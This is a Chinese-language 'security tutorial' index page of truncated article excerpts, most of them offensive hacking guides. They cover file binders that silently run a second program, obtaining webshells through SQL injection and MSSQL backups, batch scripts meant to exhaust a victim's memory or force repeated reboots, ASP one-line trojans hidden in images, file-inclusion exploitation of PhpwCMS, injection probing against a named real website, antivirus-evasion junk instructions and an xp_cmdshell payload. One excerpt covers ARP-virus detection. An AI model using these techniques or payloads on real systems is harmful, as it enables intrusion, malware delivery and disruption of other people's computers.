安全教程

如何能够快速检测定位出局域网中的ARP病毒电脑？ 面对着局域网中成百台电脑，一个一个地检测显然不是好办法。其实我们只要利用ARP病毒的基本原理：发送伪造的ARP欺骗广播，中毒电脑自身伪装成网关的特性，就可以快速锁定中毒电脑。可以设想用程序来实现以下功能...

一、传统的捆绑器 　　这种原理很简单，也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候，B.exe也跟着执行了。这种捆绑器的代码是满网都是。我最早是从jingtao的一篇关于流的文章中得知的。就目前来说，已经...

一．通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法：利用数据库备份得到WEBSHELL。创建一个表，在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来，最后再删除新建的表。 分析: N.E.V.E...

第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\\1.txt echo. >c:\\1.txt &...

大家在是否碰到过这样的站点： 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理：全部文章均在数据库存有一个副本。另处根据模板生成一个HT...

1.名称：如何制作图片ASP木马 （可显示图片） 建一个asp文件，内容为<!–＃i nclude file="ating.jpg"–> 找一个正常图片ating.jpg，插入一句话木马（比如冰狐...

具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告...

一、看见漏洞公告 　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　in...

大家可能都用过网页木马来下真正的EXE木马吧，但是有些时候 后门比较大下载的时候常常是网页暂停或是报错（CHM木马常遇到） 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数: C:\\masm32\\BIN>...

樱木花盗's BLOG 今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx 注入方式是： 一般网站的搜索都是部分匹配的 有漏洞的url是htt...

注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 ——-其中数字...

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell \’echo ^<script l...